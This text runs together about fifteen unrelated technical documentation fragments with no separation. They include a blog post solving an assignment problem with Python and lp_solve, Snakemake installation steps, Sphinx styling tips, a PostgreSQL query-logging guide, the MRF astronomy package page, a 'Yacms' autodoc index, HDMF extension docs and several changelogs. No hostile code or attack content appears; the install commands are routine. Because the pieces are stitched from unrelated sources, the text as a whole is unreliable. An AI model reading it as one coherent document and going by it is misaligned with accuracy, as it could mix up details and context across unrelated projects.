Solving the Assignment Problem with Python + lp_solve
================================================================================
The assignment problem is a special case of linear programming. Its special property is that you do not need to constrain the solution to be 0-1 or integer-valued, yet the optimal solution always comes out as exactly 0 or 1. That is the theory, however; in practice, because software tools apply numerical methods during the computation, the resulting values are often only close to 0 or close to 1, not exactly 0 or 1.

This is also why, on line 73 of the listing below, I use ``v > 0`` rather than ``v == 1``: with ``v == 1``, any ``v`` that came out as 0.999999 would not be displayed. In fact, ``v > 0.5`` would be even better, but in my final check ``> 0`` already displayed all 50 values of x, so I left it at that.

For instructions on installing the lp_solve library, see the `舊文`_ (an earlier post).
::
     1  # -*- coding: utf8 -*-
     2  """ Problem:
     3
     4      Assign the 50 non-repeating numbers 0, 1, 2, ..., 49 to x0 ~ x49, e.g. x0 = 12, x1 = 33, ...
     5
     6      y = sin(1*x0) + sin(2*x1) + sin(3*x2) + ... + sin(50*x49)
     7
     8      Find the maximum of y.
     9
    10  Solution:
    11
    12      This problem can be viewed as an assignment problem: the "workers" 0 ~ 49 are placed into the "positions" x0 ~ x49,
    13      so the decision variables become p00 (value 1 means x0=0), p01 (value 1 means x1=0),
    14      p02, ..., p49_49, i.e. 2500 decision variables, each of which must be 0 or 1.
    15
    16      Although the objective function looks nonlinear, it is actually linear; the coefficients of y look like this:
    17
    18              x0          x1          x2         ...
    19      0       0(C00)      0(C01)      0(C02)     ...
    20      1       0.84(C10)   0.91(C11)   0.14(C12)  ...
    21      2       0.91(C20)  -0.76(C21)  -0.28(C22)  ...
    22      ...     ...         ...         ...        ...
    23
    24      So if the decision variables are p20 = p01 = p12 = 1 and the rest are 0, that represents x0 = 2, x1 = 0, x2 = 1,
    25      giving y = 0.91 + 0 + 0.14 = 1.05.
    26
    27      The objective can therefore be written as y = C00 * p00 + C01 * p01 + ... + C49_49 * p49_49.
    28
    29      Finally, add the constraints
    30
    31      p00 + p01 + ... + p0_49 = 1
    32      p10 + p11 + ... + p1_49 = 1
    33      ...
    34      p49_0 + p49_1 + ... + p49_49 = 1
    35
    36      p00 + p10 + ... + p49_0 = 1
    37      p01 + p11 + ... + p49_1 = 1
    38      ...
    39      p0_49 + p1_49 + ... + p49_49 = 1
    40
    41      With these 100 constraints, the optimum of y can be found.
    42
    43  """
    44  from math import sin
    45  import lpsolve55 as L
    46
    47  LENGTH = 50
    48  C = []
    49
    50  for i in xrange(LENGTH):
    51      for j in xrange(LENGTH):
    52          C.append(-1*sin((j+1)*i))  # lp_solve minimizes by default, so every objective coefficient is multiplied by -1
    53
    54  lp = L.lpsolve('make_lp', 0, LENGTH**2)
    55  L.lpsolve('set_verbose', lp, L.IMPORTANT)
    56  ret = L.lpsolve('set_obj_fn', lp, C)
    57
    58  for i in xrange(LENGTH):
    59      p = [0,] * (LENGTH ** 2)
    60      for j in xrange(i*LENGTH, i*LENGTH+LENGTH): p[j] = 1
    61      ret = L.lpsolve('add_constraint', lp, p, L.EQ, 1)
    62
    63      p = [0,] * (LENGTH ** 2)
    64      for j in xrange(0, LENGTH):
    65          p[j*LENGTH+i] = 1
    66      ret = L.lpsolve('add_constraint', lp, p, L.EQ, 1)
    67
    68  L.lpsolve('solve', lp)
    69  print u'Objective value: %s' % (L.lpsolve('get_objective', lp) * -1)  # multiply by -1 to recover the objective value
    70  vars = L.lpsolve('get_variables', lp)[0]
    71  print u'Decision variables: %s' % vars
    72  for (ij, v) in enumerate(vars):
    73      if v > 0:
    74          i = ij / LENGTH
    75          j = ij % LENGTH
    76          print 'x%s = %s, ' % (j, i),
    77          if i % 5 + 1 == 5: print
The optimal objective value is 47.8620523191, and the variable values are as follows::

    x21 = 0, x32 = 1, x47 = 2, x33 = 3, x1 = 4,
    x37 = 5, x16 = 6, x45 = 7, x11 = 8, x25 = 9,
    x18 = 10, x30 = 11, x7 = 12, x17 = 13, x0 = 14,
    x41 = 15, x36 = 16, x22 = 17, x49 = 18, x9 = 19,
    x44 = 20, x26 = 21, x43 = 22, x13 = 23, x42 = 24,
    x35 = 25, x8 = 26, x20 = 27, x39 = 28, x40 = 29,
    x29 = 30, x10 = 31, x34 = 32, x4 = 33, x2 = 34,
    x38 = 35, x24 = 36, x6 = 37, x46 = 38, x5 = 39,
    x27 = 40, x28 = 41, x14 = 42, x23 = 43, x48 = 44,
    x19 = 45, x31 = 46, x12 = 47, x15 = 48, x3 = 49,
Postscript
----------

Following my professor's advice, adding

::

    ret = L.lpsolve('set_binary', lp, [1,]*(LENGTH**2))  # insert at roughly line 59 of the listing

to declare the decision variables as 0-1 binary variables immediately cut the computation time by 60%.
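As a cross-check on the model (my own addition, not part of the original post), the cost-matrix construction can be verified on a small instance with plain Python 3 by brute force over every permutation:

```python
# Brute-force check of the assignment model on a small instance.
from itertools import permutations
from math import sin

LENGTH = 5  # small enough to enumerate all 5! = 120 assignments

# cost[i][j] = sin((j + 1) * i): contribution to y when x_j is assigned the number i
cost = [[sin((j + 1) * i) for j in range(LENGTH)] for i in range(LENGTH)]

# Each permutation perm encodes the assignment x_j = perm[j];
# keep the one that maximizes y.
best_y, best = max(
    (sum(cost[perm[j]][j] for j in range(LENGTH)), perm)
    for perm in permutations(range(LENGTH))
)
print('optimal y = %.6f' % best_y)
print(', '.join('x%d = %d' % (j, best[j]) for j in range(LENGTH)))
```

On instances like this the LP above reaches the same optimum without any explicit integrality constraint, which is exactly the theoretical property of the assignment problem noted at the start of the post.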
.. _舊文: http://hoamon.blogspot.com/2007/10/lpsolve.html
.. author:: default
.. categories:: chinese
.. tags:: lp, python, math, cmclass
.. comments::
Command Line Tools
===================
With all tools, the library will attempt to autodetect the payload format
being used by the VI. If it's not sending any messages this is not possible, so
you may need to provide the current payload format explicitly with the
``--format`` flag. For example, here's a command to change the
passthrough status of bus 1, but with the payload format for the request
explicitly set to protocol buffers:
.. code-block:: bash
$ openxc-control set --bus 1 --passthrough --format protobuf
The following links describe the available openxc-python commands.
.. toctree::
:maxdepth: 1
:glob:
*
Release notes
=============
.. toctree::
:maxdepth: 1
3.1
3.0.2
3.0.1
3.0
2.13.1
2.13
2.12.1
2.12
2.11.1
2.11
2.10.1
2.10.0
2.9.0
2.8.0
2.7.1
2.7.0
2.6.0
2.5.2
2.5.1
2.5.0
2.4.3
2.4.2
2.4.1
2.4.0
2.3.2
2.3.1
2.3.0
2.2.3
2.2.2
2.2.1
2.2.0
2.1.4
2.1.3
2.1.2
2.1.1
2.1.0
2.0.3
2.0.2
2.0.1
2.0.0
Release notes for versions preceding ``v2.0.0`` can be found on GitHub:
https://github.com/rkhleics/wagtailmenus/releases?after=v2.0.0
.. _getting_started-installation:
============
Installation
============
Snakemake is available on PyPI, through Bioconda, and from source code.
You can use one of the following ways for installing Snakemake.
Installation via Conda
======================
This is the recommended way to install Snakemake,
because it also enables Snakemake to :ref:`handle software dependencies of your
workflow <integrated_package_management>`.
First, you have to install the Miniconda Python3 distribution.
See `here <https://conda.io/docs/install/quick.html>`_ for installation instructions.
Make sure to ...
* Install the **Python 3** version of Miniconda.
* Answer yes to the question whether conda shall be put into your PATH.
Then, you can install Snakemake with
.. code-block:: console
$ conda install -c bioconda -c conda-forge snakemake
from the `Bioconda <https://bioconda.github.io>`_ channel.
A minimal version of Snakemake which only depends on the bare necessities can be installed with
.. code-block:: console
$ conda install -c bioconda -c conda-forge snakemake-minimal
Note that Snakemake is available via Bioconda for historical, reproducibility, and continuity reasons.
However, it is easy to combine Snakemake installation with other channels, e.g., by prefixing the package name with ``bioconda::``, i.e.,
.. code-block:: console
$ conda install -c conda-forge bioconda::snakemake bioconda::snakemake-minimal
Global Installation
===================
With a working Python ``>=3.5`` setup, installation of Snakemake can be performed by issuing
.. code-block:: console
$ easy_install3 snakemake
or
.. code-block:: console
$ pip3 install snakemake
in your terminal.
Installing in Virtualenv
========================
To create an installation in a virtual environment, use the following commands:
.. code-block:: console
$ virtualenv -p python3 .venv
$ source .venv/bin/activate
$ pip install snakemake
Installing from Source
======================
We recommend installing Snakemake into a virtualenv instead of globally.
Use the following commands to create a virtualenv and install Snakemake.
Note that this will install the development version, and as you are installing from the source code, we trust that you know what you are doing and how to check out individual versions/tags.
.. code-block:: console
$ git clone https://bitbucket.org/snakemake/snakemake.git
$ cd snakemake
$ virtualenv -p python3 .venv
$ source .venv/bin/activate
$ python setup.py install
You can also use ``python setup.py develop`` to create a "development installation" in which no files are copied but a link is created and changes in the source code are immediately visible in your ``snakemake`` commands.
aft_ascii_is_whitespace
=======================
.. c:function:: bool aft_ascii_is_whitespace(char c)
Determine if a character is whitespace.
.. table:: Whitespace Characters
=============== ========
Name Literal
=============== ========
Carriage Return ``'\r'``
Form Feed ``'\f'``
Line Feed ``'\n'``
Space ``' '``
Tab ``'\t'``
Vertical Tab ``'\v'``
=============== ========
:param c: the character
:return: true if the character is whitespace
java
====
This state installs java to /opt and sets up the alternatives system to point
to the binaries under /opt. To use this state the java tarball(s) must be
downloaded manually and placed in the files directory.
Available states
================
.. contents::
:local:
``java.server_jre``
-------------------
Install the Oracle Java server JRE; the tarball must be named ``server_jre.tgz``
and placed in the files directory.
``java.server_jdk``
-------------------
Install the Oracle Java JDK
Example Pillar
==============
You can specify the ``source``, ``source_hash``, and ``home`` in your `pillar` file, like so:
.. code-block:: yaml
java:
jre:
source: http://java.com...
source_hash: sha1=SHA1OFDOWNLOAD
home: /usr/local
jdk:
source: http://java.com...
source_hash: sha1=SHA1OFDOWNLOAD
Debugging db (query) issues
===========================
Techniques for finding root cause when queries are involved.
Why
---
When you face unexpected behavior as a result of some database query
(z_db:q et al), you either have to hunt down the queries and re-run
them by hand, which is really time consuming and painful, or, which
this cookbook will detail, have postgresql log the queries for you.
The principal documentation and with more details, may be found here:
http://www.postgresql.org/docs/8.4/static/runtime-config-logging.html
Assumptions
-----------
A working system where you want to inspect the db queries being run.
How
---
Edit your ``postgresql.conf`` file, enabling ``log_statement = 'all'``.
This file has many options commented out, with explanatory comments that
you may review. The options of interest in this scenario all begin
with ``log`` (or similar).
By having ``log_destination = 'stderr'`` and ``logging_collector =
on``, you can capture your logging output to file.
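Putting these together, a minimal ``postgresql.conf`` fragment for this scenario might look like the following (a sketch; option defaults vary between PostgreSQL versions)::

    log_statement = 'all'
    log_destination = 'stderr'
    logging_collector = on
    log_directory = 'pg_log'

Reload (or restart) PostgreSQL afterwards so the changed settings take effect.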
Add Custom Style Sheet
==============================================================================
- This is :red:`Red` text.
- This is :blue:`Blue` text.
- This is :green:`Green` text.
1. Add your custom ``.css`` file. It should sit at ``./_static/css/xxx.css``, say ``custom-style.css``. In this style sheet, you assign different styles by class name.
2. Tell Sphinx to add this style sheet in ``conf.py``::
def setup(app):
app.add_stylesheet('css/custom-style.css')
3. Define the class name with a role in the ``.custom-style.rst`` file (the name doesn't matter, but it has to start with ``.``). Then every time you mark text with ``:rolename:``, that text gets a pre-defined HTML tag class.
4. Include this role definition ``.rst`` file everywhere in ``conf.py``::
rst_prolog = '\n.. include:: .custom-style.rst\n'
Done!
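The role-definition file from step 3 is not shown above; for the three colors demonstrated on this page it could be as small as this (my sketch of ``.custom-style.rst``)::

    .. role:: red
    .. role:: blue
    .. role:: green

with matching class rules (``.red { color: red; }`` and so on) in ``custom-style.css``.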
CMAKE_XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER
----------------------------------------------
Whether to disable the ``Main Thread Checker``
in the Diagnostics section of the generated Xcode scheme.
This variable initializes the
:prop_tgt:`XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER`
property on all targets.
Please refer to the :prop_tgt:`XCODE_GENERATE_SCHEME` target property
documentation to see all Xcode schema related properties.
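For example, the checker could be disabled for every target in a project by setting this variable near the top of the top-level ``CMakeLists.txt`` (a sketch; only meaningful with the Xcode generator):

.. code-block:: cmake

  set(CMAKE_XCODE_SCHEME_DISABLE_MAIN_THREAD_CHECKER ON)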
MRF: Multi-Resolution Filtering
===============================
Multi-Resolution Filtering is a method for isolating faint, extended emission in `Dragonfly <http://dragonflytelescope.org>`_ data and other low resolution images. It is implemented in an open-source MIT licensed Python package ``mrf``. Please read `van Dokkum et al. (2019) <https://arxiv.org/abs/1910.12867>`_ for the methodology and description of implementation.
.. image:: https://img.shields.io/badge/license-MIT-blue
:target: https://opensource.org/licenses/mit-license.php
:alt: License
.. image:: https://readthedocs.org/projects/mrfiltering/badge/?version=latest
:target: https://mrfiltering.readthedocs.io/en/latest/?badge=latest
:alt: Documentation Status
.. image:: https://img.shields.io/badge/version-1.0.4-green
:alt: Version
.. image:: https://img.shields.io/badge/arXiv-1910.12867-blue
:target: https://arxiv.org/abs/1910.12867
:alt: arXiv
.. image:: https://img.shields.io/badge/GitHub-astrojacobli%2Fmrf-blue
:target: https://github.com/AstroJacobLi/mrf
:alt: GitHub Repo
.. image:: https://img.shields.io/github/repo-size/astrojacobli/mrf
:target: https://github.com/AstroJacobLi/mrf
:alt: Repo Size
Basic Usage
-----------
.. code-block:: python
from mrf.task import MrfTask
task = MrfTask('m101-df3-task.yaml')
img_lowres = 'M101_DF3_df_r.fits'
img_hires_b = 'M101_DF3_cfht_r.fits'
img_hires_r = 'M101_DF3_cfht_r.fits'
certain_gal_cat = 'gal_cat_m101.txt'
results = task.run(img_lowres, img_hires_b, img_hires_r, certain_gal_cat,
output_name='m101_df3', verbose=True)
results.lowres_final.display_image()
.. figure:: https://github.com/AstroJacobLi/mrf/raw/master/examples/M101-DF3/m101-df3-demo.png
:width: 640px
:align: center
:alt: alternate text
:figclass: align-center
Please check :ref:`Tutorials` for more details.
User Guide
-----------
.. toctree::
:maxdepth: 2
guide/install
tutorial/mrf-tutorial
.. toctree::
:maxdepth: 1
tutorial/configuration
tutorial/misc
license
guide/changelog
Index
------------------
* :ref:`modindex`
* :ref:`search`
Citation
--------
``mrf`` is a free software made available under the MIT License by `Pieter van Dokkum <http://pietervandokkum.com>`_ (initial development) and `Jiaxuan Li <https://astrojacobli.github.io>`_ (implementation, maintenance, and documentation). If you use this package in your work, please cite `van Dokkum et al. (2019) <https://arxiv.org/abs/1910.12867>`_.
You are welcome to report bugs in ``mrf`` via creating issues at https://github.com/AstroJacobLi/mrf/issues.
Need more help? Feel free to contact via pieter.vandokkum@yale.edu and jiaxuan_li@pku.edu.cn.
Acknowledgment
---------------
Many scripts and snippets are from `kungpao <https://github.com/dr-guangtou/kungpao>`_ (mainly written by `Song Huang <http://dr-guangtou.github.io>`_). `Johnny Greco <http://johnnygreco.github.io>`_ kindly shared his idea of the code structure. `Roberto Abraham <http://www.astro.utoronto.ca/~abraham/Web/Welcome.html>`_ found the first few bugs of this package and provided useful solutions. Here we appreciate their help!
========
Packages
========
Below are auto-generated docs mostly covering each of the packages contained
within Yacms that are added to ``settings.INSTALLED_APPS``.
``Yacms.boot``
==================
.. automodule:: Yacms.boot
:members:
``Yacms.core``
==================
.. automodule:: Yacms.core
``Yacms.core.models``
-------------------------
.. automodule:: Yacms.core.models
:members:
``Yacms.core.managers``
---------------------------
.. automodule:: Yacms.core.managers
:members:
``Yacms.core.views``
------------------------
.. automodule:: Yacms.core.views
:members:
``Yacms.core.forms``
------------------------
.. automodule:: Yacms.core.forms
:members:
``Yacms.core.admin``
------------------------
.. automodule:: Yacms.core.admin
:members:
``Yacms.core.middleware``
-----------------------------
.. automodule:: Yacms.core.middleware
:members:
``Yacms.core.templatetags.Yacms_tags``
----------------------------------------------
.. automodule:: Yacms.core.templatetags.Yacms_tags
:members:
``Yacms.core.management.commands``
--------------------------------------
.. automodule:: Yacms.core.management.commands.createdb
:members:
``Yacms.core.request``
--------------------------
.. automodule:: Yacms.core.request
:members:
``Yacms.core.tests``
------------------------
.. automodule:: Yacms.core.tests
:members:
``Yacms.pages``
===================
.. automodule:: Yacms.pages
``Yacms.pages.models``
--------------------------
.. automodule:: Yacms.pages.models
:members:
``Yacms.pages.views``
-------------------------
.. automodule:: Yacms.pages.views
:members:
``Yacms.pages.admin``
-------------------------
.. automodule:: Yacms.pages.admin
:members:
``Yacms.pages.middleware``
------------------------------
.. automodule:: Yacms.pages.middleware
:members:
``Yacms.pages.templatetags.pages_tags``
-------------------------------------------
.. automodule:: Yacms.pages.templatetags.pages_tags
:members:
``Yacms.pages.page_processors``
-----------------------------------
.. automodule:: Yacms.pages.page_processors
:members:
``Yacms.generic``
=====================
.. automodule:: Yacms.generic
``Yacms.generic.models``
----------------------------
.. automodule:: Yacms.generic.models
:members:
``Yacms.generic.managers``
------------------------------
.. automodule:: Yacms.generic.managers
:members:
``Yacms.generic.fields``
----------------------------
.. automodule:: Yacms.generic.fields
:members:
``Yacms.generic.views``
---------------------------
.. automodule:: Yacms.generic.views
:members:
``Yacms.generic.forms``
---------------------------
.. automodule:: Yacms.generic.forms
:members:
``Yacms.generic.admin``
---------------------------
.. automodule:: Yacms.generic.admin
:members:
``Yacms.generic.templatetags.comment_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.comment_tags
:members:
``Yacms.generic.templatetags.disqus_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.disqus_tags
:members:
``Yacms.generic.templatetags.keyword_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.keyword_tags
:members:
``Yacms.generic.templatetags.rating_tags``
-----------------------------------------------
.. automodule:: Yacms.generic.templatetags.rating_tags
:members:
``Yacms.blog``
==================
.. automodule:: Yacms.blog
``Yacms.blog.models``
-------------------------
.. automodule:: Yacms.blog.models
:members:
``Yacms.blog.views``
------------------------
.. automodule:: Yacms.blog.views
:members:
``Yacms.blog.forms``
------------------------
.. automodule:: Yacms.blog.forms
:members:
``Yacms.blog.admin``
------------------------
.. automodule:: Yacms.blog.admin
:members:
``Yacms.blog.feeds``
------------------------
.. automodule:: Yacms.blog.feeds
:members:
``Yacms.blog.templatetags.blog_tags``
-----------------------------------------
.. automodule:: Yacms.blog.templatetags.blog_tags
:members:
``Yacms.blog.management.base``
----------------------------------
.. automodule:: Yacms.blog.management.base
:members:
``Yacms.blog.management.commands``
--------------------------------------
.. automodule:: Yacms.blog.management.commands.import_rss
:members:
.. automodule:: Yacms.blog.management.commands.import_blogger
:members:
.. automodule:: Yacms.blog.management.commands.import_wordpress
:members:
.. automodule:: Yacms.blog.management.commands.import_tumblr
:members:
``Yacms.accounts``
======================
.. automodule:: Yacms.accounts
:members:
``Yacms.accounts.views``
----------------------------
.. automodule:: Yacms.accounts.views
:members:
``Yacms.accounts.forms``
----------------------------
.. automodule:: Yacms.accounts.forms
:members:
``Yacms.accounts.templatetags.accounts_tags``
-------------------------------------------------
.. automodule:: Yacms.accounts.templatetags.accounts_tags
:members:
``Yacms.accounts.admin``
----------------------------
.. automodule:: Yacms.accounts.admin
:members:
``Yacms.forms``
===================
.. automodule:: Yacms.forms
``Yacms.forms.models``
-------------------------------
.. automodule:: Yacms.forms.models
:members:
``Yacms.forms.forms``
------------------------------
.. automodule:: Yacms.forms.forms
:members:
``Yacms.forms.page_processors``
----------------------------------------
.. automodule:: Yacms.forms.page_processors
:members:
``Yacms.forms.admin``
------------------------------
.. automodule:: Yacms.forms.admin
:members:
``Yacms.galleries``
=======================
.. automodule:: Yacms.galleries
``Yacms.galleries.models``
-------------------------------
.. automodule:: Yacms.galleries.models
:members:
``Yacms.galleries.admin``
-------------------------------
.. automodule:: Yacms.galleries.admin
:members:
``Yacms.conf``
==================
.. automodule:: Yacms.conf
:members:
``Yacms.conf.models``
-------------------------
.. automodule:: Yacms.conf.models
:members:
``Yacms.conf.forms``
------------------------
.. automodule:: Yacms.conf.forms
:members:
``Yacms.conf.admin``
------------------------
.. automodule:: Yacms.conf.admin
:members:
``Yacms.conf.context_processors``
-------------------------------------
.. automodule:: Yacms.conf.context_processors
:members:
``Yacms.template``
======================
.. automodule:: Yacms.template
:members:
``Yacms.template.loader_tags``
==================================
.. automodule:: Yacms.template.loader_tags
:members:
``Yacms.twitter``
=====================
.. automodule:: Yacms.twitter
``Yacms.twitter.models``
----------------------------
.. automodule:: Yacms.twitter.models
:members:
``Yacms.twitter.managers``
------------------------------
.. automodule:: Yacms.twitter.managers
:members:
``Yacms.twitter.templatetags.twitter_tags``
-----------------------------------------------
.. automodule:: Yacms.twitter.templatetags.twitter_tags
:members:
``Yacms.twitter.management.commands``
-----------------------------------------
.. automodule:: Yacms.twitter.management.commands.poll_twitter
:members:
``Yacms.utils``
===================
.. automodule:: Yacms.utils
.. automodule:: Yacms.utils.cache
:members:
.. automodule:: Yacms.utils.conf
:members:
.. automodule:: Yacms.utils.device
:members:
.. automodule:: Yacms.utils.docs
:members:
.. automodule:: Yacms.utils.email
:members:
.. automodule:: Yacms.utils.html
:members:
.. automodule:: Yacms.utils.importing
:members:
.. automodule:: Yacms.utils.models
:members:
.. automodule:: Yacms.utils.sites
:members:
.. automodule:: Yacms.utils.tests
:members:
.. automodule:: Yacms.utils.timezone
:members:
.. automodule:: Yacms.utils.urls
:members:
.. automodule:: Yacms.utils.views
:members:
.. _extending-standard:
Extending standards
===================
The following page will discuss how to extend a standard using HDMF.
.. _creating-extensions:
Creating new Extensions
-----------------------
Standards specified using HDMF are designed to be extended. Extensions to a standard can be written using classes
provided in the :py:mod:`hdmf.spec` module. The classes :py:class:`~hdmf.spec.spec.GroupSpec`,
:py:class:`~hdmf.spec.spec.DatasetSpec`, :py:class:`~hdmf.spec.spec.AttributeSpec`, and :py:class:`~hdmf.spec.spec.LinkSpec`
can be used to define custom types.
Attribute Specifications
^^^^^^^^^^^^^^^^^^^^^^^^
Specifying attributes is done with :py:class:`~hdmf.spec.spec.AttributeSpec`.
.. code-block:: python
from hdmf.spec import AttributeSpec
spec = AttributeSpec('bar', 'a value for bar', 'float')
Dataset Specifications
^^^^^^^^^^^^^^^^^^^^^^
Specifying datasets is done with :py:class:`~hdmf.spec.spec.DatasetSpec`.
.. code-block:: python
    from hdmf.spec import AttributeSpec, DatasetSpec

    spec = DatasetSpec('A custom data type',
                       name='qux',
                       attributes=[
                           AttributeSpec('baz', 'a value for baz', 'str'),
                       ],
                       shape=(None, None))
Using datasets to specify tables
++++++++++++++++++++++++++++++++
Tables can be specified using :py:class:`~hdmf.spec.spec.DtypeSpec`. To specify a table, provide a
list of :py:class:`~hdmf.spec.spec.DtypeSpec` objects to the *dtype* argument.
.. code-block:: python
    from hdmf.spec import AttributeSpec, DatasetSpec, DtypeSpec

    spec = DatasetSpec('A custom data type',
                       name='qux',
                       attributes=[
                           AttributeSpec('baz', 'a value for baz', 'str'),
                       ],
                       dtype=[
                           DtypeSpec('foo', 'column for foo', 'int'),
                           DtypeSpec('bar', 'a column for bar', 'float')
                       ])
Group Specifications
^^^^^^^^^^^^^^^^^^^^
Specifying groups is done with the :py:class:`~hdmf.spec.spec.GroupSpec` class.
.. code-block:: python

    from hdmf.spec import GroupSpec

    spec = GroupSpec('A custom data type',
                     name='quux',
                     attributes=[...],
                     datasets=[...],
                     groups=[...])

Data Type Specifications
^^^^^^^^^^^^^^^^^^^^^^^^

:py:class:`~hdmf.spec.spec.GroupSpec` and :py:class:`~hdmf.spec.spec.DatasetSpec` use the arguments ``data_type_inc`` and
``data_type_def`` for declaring new types and extending existing types. New types are specified by setting the argument
``data_type_def``. New types can extend an existing type by specifying the argument ``data_type_inc``.

Create a new type

.. code-block:: python

    from hdmf.spec import GroupSpec

    # A list of AttributeSpec objects to specify new attributes
    addl_attributes = [...]
    # A list of DatasetSpec objects to specify new datasets
    addl_datasets = [...]
    # A list of GroupSpec objects to specify new groups
    addl_groups = [...]

    spec = GroupSpec('A custom data type',
                     attributes=addl_attributes,
                     datasets=addl_datasets,
                     groups=addl_groups,
                     data_type_def='MyNewType')

Extend an existing type

.. code-block:: python

    from hdmf.spec import GroupSpec

    # A list of AttributeSpec objects to specify additional attributes or attributes to be overridden
    addl_attributes = [...]
    # A list of DatasetSpec objects to specify additional datasets or datasets to be overridden
    addl_datasets = [...]
    # A list of GroupSpec objects to specify additional groups or groups to be overridden
    addl_groups = [...]

    spec = GroupSpec('An extended data type',
                     attributes=addl_attributes,
                     datasets=addl_datasets,
                     groups=addl_groups,
                     data_type_inc='SpikeEventSeries',
                     data_type_def='MyExtendedSpikeEventSeries')

Existing types can be instantiated by specifying ``data_type_inc`` alone.

.. code-block:: python

    from hdmf.spec import GroupSpec

    # use another GroupSpec object to specify that a group of type
    # ElectricalSeries should be present in the new type defined below
    addl_groups = [GroupSpec('An included ElectricalSeries instance',
                             data_type_inc='ElectricalSeries')]

    spec = GroupSpec('An extended data type',
                     groups=addl_groups,
                     data_type_inc='SpikeEventSeries',
                     data_type_def='MyExtendedSpikeEventSeries')

Datasets can be extended in the same manner (with regard to ``data_type_inc`` and ``data_type_def``)
by using the class :py:class:`~hdmf.spec.spec.DatasetSpec`.

.. _saving-extensions:

Saving Extensions
-----------------

Extensions are used by including them in a loaded namespace. Namespaces and extensions need to be saved to file
for downstream use. The class :py:class:`~hdmf.spec.write.NamespaceBuilder` can be used to create new namespace and
specification files.

Create a new namespace with extensions

.. code-block:: python

    from hdmf.spec import GroupSpec, NamespaceBuilder

    # create a builder for the namespace
    ns_builder = NamespaceBuilder("Extension for use in my laboratory", "mylab", ...)

    # create extensions
    ext1 = GroupSpec('A custom SpikeEventSeries interface',
                     attributes=[...],
                     datasets=[...],
                     groups=[...],
                     data_type_inc='SpikeEventSeries',
                     data_type_def='MyExtendedSpikeEventSeries')

    ext2 = GroupSpec('A custom EventDetection interface',
                     attributes=[...],
                     datasets=[...],
                     groups=[...],
                     data_type_inc='EventDetection',
                     data_type_def='MyExtendedEventDetection')

    # add the extensions
    ext_source = 'mylab.specs.yaml'
    ns_builder.add_spec(ext_source, ext1)
    ns_builder.add_spec(ext_source, ext2)

    # include an existing namespace - this will include all specifications in that namespace
    ns_builder.include_namespace('collab_ns')

    # save the namespace and extensions
    ns_path = 'mylab.namespace.yaml'
    ns_builder.export(ns_path)

.. tip::

    Using the API to generate extensions (rather than writing YAML sources directly) helps avoid errors in the
    specification (e.g., due to missing required keys or invalid values) and ensure compliance of the extension
    definition with the HDMF specification language. It also helps with maintenance of extensions, e.g., if
    extensions have to be ported to newer versions of the
    `specification language <https://schema-language.readthedocs.io/en/latest/>`_ in the future.

.. _incorporating-extensions:

Incorporating extensions
------------------------

HDMF supports extending existing data types.
Extensions must be registered with HDMF to be used for reading and writing of custom data types.

The following code demonstrates how to load custom namespaces.

.. code-block:: python

    from hdmf import load_namespaces

    namespace_path = 'my_namespace.yaml'
    load_namespaces(namespace_path)

.. note::

    This will register all namespaces defined in the file ``'my_namespace.yaml'``.

Container : Representing custom data
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

To read and write custom data, corresponding :py:class:`~hdmf.container.Container` classes must be associated with their
respective specifications. :py:class:`~hdmf.container.Container` classes are associated with their respective
specification using the decorator :py:func:`~hdmf.common.register_class`.

The following code demonstrates how to associate a specification with the :py:class:`~hdmf.container.Container` class
that represents it.

.. code-block:: python

    from hdmf.common import register_class
    from hdmf.container import Container

    @register_class('MyExtension', 'my_namespace')
    class MyExtensionContainer(Container):

        ...

:py:func:`~hdmf.common.register_class` can also be used as a function.

.. code-block:: python

    from hdmf.common import register_class
    from hdmf.container import Container

    class MyExtensionContainer(Container):

        ...

    register_class(data_type='MyExtension', namespace='my_namespace', container_cls=MyExtensionContainer)

If you do not have a :py:class:`~hdmf.container.Container` subclass to associate with your extension specification,
a class will be created dynamically by default.
To use the dynamic class, you will need to retrieve the class object using the function :py:func:`~hdmf.common.get_class`.
Once you have retrieved the class object, you can use it just like you would a statically defined class.

.. code-block:: python

    from hdmf.common import get_class

    MyExtensionContainer = get_class('my_namespace', 'MyExtension')
    my_ext_inst = MyExtensionContainer(...)

If you are using IPython, you can access documentation for the class's constructor using the ``help`` command.

ObjectMapper : Customizing the mapping between Container and the Spec
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

If your :py:class:`~hdmf.container.Container` extension requires custom mapping of the
:py:class:`~hdmf.container.Container` class for reading and writing, you will need to implement and register a custom
:py:class:`~hdmf.build.objectmapper.ObjectMapper`.

:py:class:`~hdmf.build.objectmapper.ObjectMapper` extensions are registered with the decorator
:py:func:`~hdmf.common.register_map`.

.. code-block:: python

    from hdmf.common import register_map
    from hdmf.build import ObjectMapper

    @register_map(MyExtensionContainer)
    class MyExtensionMapper(ObjectMapper):

        ...

:py:func:`~hdmf.common.register_map` can also be used as a function.

.. code-block:: python

    from hdmf.common import register_map
    from hdmf.build import ObjectMapper

    class MyExtensionMapper(ObjectMapper):

        ...

    register_map(MyExtensionContainer, MyExtensionMapper)

.. tip::

    ObjectMappers allow you to customize how objects in the spec are mapped to attributes of your Container in
    Python. This is useful, e.g., in cases where you want to customize the default mapping. For an overview of the
    concepts of containers, spec, builders, and object mappers in HDMF, see :ref:`software-architecture`.

.. _documenting-extensions:

Documenting Extensions
----------------------

Coming soon!

Further Reading
---------------

* **Specification Language:** For a detailed overview of the specification language itself see https://schema-language.readthedocs.io/en/latest/
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package hector_xacro_tools
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

0.3.2 (2014-09-01)
------------------

0.3.1 (2014-03-30)
------------------

0.3.0 (2013-09-02)
------------------
* catkinized stack hector_models
.. _whats_new:

Release History
===============

A catalog of new features, improvements, and bug-fixes in each release. Follow
links to the relevant GitHub issue or pull request for specific code changes
and any related discussion.

.. include:: whats_new/v1.1.0.txt
.. include:: whats_new/v1.0.6.txt
.. include:: whats_new/v1.0.5.txt
.. include:: whats_new/v1.0.4.txt
.. include:: whats_new/v1.0.3.txt
.. include:: whats_new/v1.0.2.txt
